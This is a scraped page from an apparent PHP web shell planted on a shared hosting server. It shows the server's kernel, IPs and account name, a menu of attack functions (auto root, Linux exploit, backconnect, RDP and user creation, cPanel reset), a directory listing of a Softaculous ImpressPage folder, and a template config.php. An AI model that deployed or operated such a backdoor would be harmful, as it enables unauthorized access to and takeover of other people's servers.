Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.144.93.34
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
impresspage /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
PasswordHash.php
6.74
KB
-rw-r--r--
clone.php
5.87
KB
-rw-r--r--
config.php
820
B
-rw-r--r--
edit.php
4.4
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
107
B
-rw-r--r--
import.php
4.49
KB
-rw-r--r--
info.xml
4.18
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.93
KB
-rw-r--r--
install.xml
1.25
KB
-rw-r--r--
md5
13.7
KB
-rw-r--r--
notes.txt
455
B
-rw-r--r--
upgrade.php
3.53
KB
-rw-r--r--
upgrade.xml
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php /** * @package ImpressPages */ return [ 'sessionName' => 'ses[[SESSION_NAME]]', // prevents session conflict when two sites runs on the same server 'developmentEnvironment' => 1, // displays error and debug information. Change to 0 before deployment to production server 'showErrors' => 1, // 0 if you don't wish to display errors on the page 'debugMode' => 0, // Debug mode loads raw unminified JavaScript files, alerts AJAX errors. 'timezone' => 'America/New_York', // PHP 5 requires timezone to be set. 'db' => array ( 'hostname' => '[[softdbhost]]', 'username' => '[[softdbuser]]', 'password' => '[[softdbpass]]', 'tablePrefix' => '[[dbprefix]]', 'database' => '[[softdb]]', 'charset' => 'utf8', ), // Database configuration ];
Close